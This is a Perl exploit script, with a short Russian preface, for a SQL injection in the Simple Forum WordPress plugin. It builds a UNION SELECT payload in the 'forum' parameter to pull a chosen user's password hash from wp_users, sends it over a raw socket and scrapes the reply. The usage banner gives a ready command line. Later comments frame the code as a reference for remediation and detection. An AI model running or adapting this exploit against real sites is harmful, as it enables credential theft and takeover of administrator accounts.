Simple Forum (for WordPress) sql-inject exploit (public version)
Добрый день. Я нашел уязвимость в форме Simple Forum для движка WordPress.
Решил первыми осведомить вас! :)
Через пару минут буду отсылать на milw0rm


#!/usr/bin/perl

use IO::Socket;

# 2007 proof-of-concept for a SQL injection in the Simple Forum WordPress
# plugin: the `forum` query-string parameter is injectable (the payload
# assembled below rides on it), and a 7-column UNION SELECT pulls `user_pass`
# out of `wp_users` for one user ID. Kept as a reference for remediation and
# detection, not for use:
#   - Remediation: validate/cast the forum id to an integer (or bind it as a
#     parameter) before it reaches the query.
#   - Detection: GET requests whose query string contains `UNION%20SELECT`
#     together with a `wp_users` reference (see the $path assembly below).
# Legacy style throughout: no `use strict`/`use warnings`, package globals,
# unchecked prints to the socket. Expects four positional arguments:
# URL, install directory (request path prefix), user ID, page ID.
if (@ARGV <4)
{
# Usage banner. The q() literal is runtime output and is left verbatim.
print q(
###############################################################################

Simple Forum (for WordPress) sql-inject exploit (public version)
Tested on SF version 1.0, 1.1, 1.9 and WordPress 2.1.0, 2.1.1, 2.1.2
This exploit gives you selected user passwd hash,
for more features use Private Version
Discovered and coded by FrenzY ( [email protected])

— Public Version —

params:
[URL] - URL of web-site
[DIR] - Directory where WordPress is installed
[USER ID] - 1 for admin user
[PAGE ID] - ID of the page where forum is located

ex: if http://www.somefuckingblog.com/?page_id=3

cmd> perl simpleforum_wp.pl http://www.somefuckingblog.com / 1 3 > sfb.txt
(i recomend to use file output, because result may be non-readable from the
CMD :-))

###############################################################################
);
exit;
}

###############################################################################

# Positional arguments, no validation: $uid and $pid go straight into the
# request path.
$serv = $ARGV[0];
$dir = $ARGV[1];
$uid = $ARGV[2];
$pid = $ARGV[3];

# Strips a leading "http://" so $serv is a bare host for PeerAddr and the
# Host header. The /e flag evaluates the empty replacement as code, which
# yields '' -- so this is just a deletion.
$serv =~ s/(http:\/\/)//eg;

print "\r\n";
print "We are going to make a sql-inject at $serv now\r\n";
print "- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

          • -\r\n";

# Request path: <dir>?page_id=<pid>&forum=<payload><uid>. The payload
# neutralises the original WHERE with "1=0" and UNIONs a 7-column row whose
# second column is user_pass; judging by the scrape loop below, column 2 is
# the one the page renders. This is the signature a WAF/IDS rule would key on.
$path = $dir;
$path .= '?page_id=';
$path .= $pid;
$path .=
'&forum=1%20and%201=0%20UNION%20SELECT%201,user_pass,3,4,5,6,7%20FROM%20wp_users%20WHERE%20ID=';

$path .= $uid;

# Plain TCP to port 80; no TLS, no redirect handling. Fails hard on connect
# error.
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv",
PeerPort => "80") || die "[-] CONNECT FAILED :-(\r\n";

# Hand-rolled HTTP/1.1 request; write errors on the socket are not checked.
print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: /\n";
print $socket "Connection: close\n\n";

# $i is a one-way flag: once the 'arrowr.png" alt=""' marker has been seen,
# every following response line is echoed as " result:" until the loop ends.
$i = 0;

# Scrape the response line by line. "Currently Online" is taken to mean the
# page rendered normally (no injected row), so the script gives up there.
while ($answer = <$socket>)
{
if ($answer =~ /Currently Online/) { print "- - - - - - - - - - - - - - - -

                                                • -\r\n"; exit(); }
                                                  if ($i == 1) { print " result: $answer"; }
                                                  if ($answer =~ /arrowr.png" alt=""/) { $i = 1; }
                                                  }

# Reached only if the socket hit EOF without the "Currently Online" marker.
print "[-] EXPLOITING FAILED :-( \r\n";
print "- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

          • -\r\n";

EOF



Love,
Ivan